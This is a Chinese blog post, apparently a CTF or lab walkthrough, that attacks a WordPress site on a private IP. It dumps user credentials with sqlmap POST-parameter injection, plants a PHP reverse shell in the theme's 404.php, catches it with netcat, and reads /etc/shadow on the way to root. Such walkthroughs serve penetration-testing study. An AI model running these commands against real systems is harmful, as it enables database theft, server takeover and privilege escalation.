sql注入post参数注入

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量4.5k 收藏 3
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/101481223
版权

request.raw抓取的数据包头,最高水平最高风险,用Mysql的数据库dbms,不再询问--batch

用Burpsuite抓取,复制包头,gedit request.raw复制进去

sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns  --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C password,username --dump --dbms mysql

http://192.168.1.109:8080/wordpress/wp-login.php

上传webshell获取控制权

wordpress后台寻找上传点

主题的404.php可以上传webshell

webshell获取 /usr/share/webshells/php

php-reverse-shell.php反弹shell

复制到桌面,gedit修改php-reverse-shell.php,

修改ip和端口号,保存复制

上传webshell

启动监听

nc -nlvp port

启动终端

优化shell

python -c "import pty;pty.spawn('/bin/bash')"

访问webshell才能获得反弹shell

http://ip:port/目录/wp-content/themes/主题名/404.php

http://192.168.1.109:8080/wordpress/wp-content/themes/twentythirteen/404.php

获取root权限

cat /etc/shadow cat /etc/passwd查看敏感文件

使用su- 提升root权限

^BonnenuIt
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入 pikachu post数字型注入
08-12
2. 参数化查询:使用参数化查询来防止 SQL 注入攻击。 3. 错误报告:记录错误日志,检测和防御 SQL 注入攻击。 Pikachu Post 数字型注入是一种新的 SQL 注入方法,使用 Hackbar 工具可以简化攻击过程。开发者需要...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思路,帮助你理解和防范这种攻击。 首先,SQL...
sql_injection之post注入
aipei5098的博客
04-14 268
1、代码篇 </html> <center> <form action="#" method="post"> 姓名:<input type="text" name="user"><br> 密码:<input type="text" name="pass"><br> <input ty...
5-Web安全——基于POST提交的SQL注入
网络安全
05-24 1480
1. POST提交注入方式 在之前的示例中基本上是使用的get方式提交,真实的注入环境中是使用的POST提交注入方式,两种方式区别在于: GET方式提交可以被网页缓存,POST方式则不会 GET提交参数会保留在浏览器的历史记录中,POST方式不会 GET提交可以被收藏为书签,POST方式不会 GET提交有长度限制,最长2048个字符;POST提交没有长度要求,允许使用ASCII码值,还可以使用二进制数据 总体上来说,POST提交方式比GET方式更加安全,真实环境中基本上不使用GET方式,而是
Web安全基础学习:SQL注入漏洞之PostgreSql注入
最新发布
qq_51862722的博客
06-18 1089
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
SQL注入post注入
游魂的博客
12-06 2016
Post注入: 一般存在搜索框或登入页面位置,需要用burp抓包查看。 可以看到post数据中nama表单传的值为hack 用hackbar插件post数据中将传的值后面输入单引号或and 或 order by测试 输入单引号报错,查不到任何数据,由此判断存在post注入。 由于测试的为搜索框所以测试语句为%%27%23,才能正常查询出数据 注意在hackbar中是需要url编码才可以。 确...
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 662
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
360提供的php防sql注入代码修改类
05-02
SQL注入是一种利用网站应用程序的漏洞,通过输入恶意SQL语句来控制数据库的攻击手段。攻击者可以获取、修改、删除数据库中的敏感信息,甚至完全控制整个系统。为了防止SQL注入,我们需要遵循以下原则: 1. 使用...
Pangolin穿山甲SQL注入工具
12-03
**Pangolin穿山甲SQL注入工具**是一种广泛用于网络安全测试和漏洞评估的专业软件,尤其在网站渗透测试领域中有着重要应用。该工具的主要功能是针对目标系统进行SQL(Structured Query Language)注入攻击,以此来...
SQL注入---POST注入
zhoutong2323的博客
04-07 824
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
SQL Injection (POST/Select)
qq_40554015的博客
09-17 257
这道题显然还是用burpsuit抓包来看看: movie=2 和上一题不同,这里是数字,猜测换成其他数字就是其他电影,那么怎么换呢? burpsuit抓包后右键发送到Repeater,修改数据再发送就可以了! 修改为3,果然变成了Man of Steel 那就直接在左边修改数据post就可以了 先来看看可显示位: 和前几题真是一模一样! 再来看看库名: 接下来是表名: 然后是字段名: 最后看一看login和pass...
Sql注入之做post注入
weixin_50205723的博客
09-19 1159
一、使用burp suite进行抓包 1、将浏览器换为proxy连接 2、点击页面会与数据库交互的位置得到包 3、选择
sql注入post 传参方式的注入
没有故事
02-27 940
sqlmap -r ./sqlmapfile(-r 捕获的请求文件及其所在位置) -p id(加入指定参数) --cookie=""先将post请求在burp捕获,将抓到的请求内容保存到文件中,在sqlmap安装 目录下面新建文本文件为x.txt。是否存在注入点,注入点在有和数据库服务器交互的地方。加入-p 指定参数 -p id。在输入框里面进行注入
入侵检测——jsql
LainWith的博客
07-02 2331
jSQL injection是一款由JAVA开法的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能,是一款非常不错的工具,也是渗透测试人员的强大助手。它支持GET\POST注入,同时也可以进行HTTP头注入(这个需要用户自动构建),它是免费的,开源的,跨平台的Windows,Linux和Mac,它适用于版本11到17的Java工具的安装与应用范围,参见github地址:https://github.com
如何应对POSTsql注入
Bul1et的博客
10-31 2366
前两天挖了一个漏洞这里总结一下 POSTsql注入过滤验证码 拿到后台我先测试一波万能密码 1'or'1'='1   'or'='or' 发现回显不同就判定存在sql注入 然后我就直接上sqlmap喽 直接跑请求包 不过sqlmap的命令也有讲究 开始我使用命令 sqlmap.py -r 1.txt --dbs --random-agent -p Admin --string=...
Kali自动化SQL注入神器————JSQL
Fly_鹏程万里
06-07 8094
JSQL简介jSQL injection是一款由JAVA开法的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能,是一款非常不错的工具,也是渗透测试人员的强大助手。它支持GET\POST注入,同时也可以进行HTTP头注入(这个需要用户自动构建)主界面对于JSQL,用户可以通过在终端中直接输入jsq...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值